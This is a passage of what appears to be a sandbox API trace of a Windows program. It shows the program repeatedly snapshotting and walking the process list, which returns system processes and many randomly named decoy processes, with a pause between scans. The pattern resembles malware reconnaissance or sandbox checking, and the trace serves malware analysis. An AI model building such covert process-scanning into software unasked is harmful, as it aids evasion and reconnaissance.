th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0109.380] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.382] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.383] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0109.385] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0109.386] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0109.388] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.389] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.391] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0109.392] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0109.394] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0109.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0109.438] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0109.440] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0109.441] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0109.443] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0109.444] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) 
returned 1 [0109.445] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0109.447] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0109.448] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0109.450] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0109.451] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0109.452] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0109.454] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="pickup.exe")) returned 1 [0109.455] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0109.456] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0109.458] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0109.459] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0109.460] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.462] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0109.463] CloseHandle (hObject=0xc4) returned 1 [0109.463] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0109.469] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.470] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0109.471] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0109.471] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.472] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0109.473] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.508] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0109.509] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0109.509] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0109.510] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0109.510] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.511] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.512] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.512] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.513] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.514] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0109.514] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.515] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.516] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0109.517] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.518] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.519] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0109.520] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0109.521] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0109.522] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.523] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.525] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0109.526] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0109.527] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0109.529] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0109.530] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0109.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0109.532] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0109.533] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0109.534] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0109.535] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0109.536] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0109.538] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0109.539] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0109.540] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0109.541] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0109.542] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0109.543] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0109.544] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0109.545] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0109.547] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0109.548] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.549] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0109.551] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) 
returned 1 [0109.552] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0109.604] CloseHandle (hObject=0xbc) returned 1 [0109.604] Sleep (dwMilliseconds=0x12c) [0109.911] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0109.916] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.916] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0109.917] Process32NextW (in: 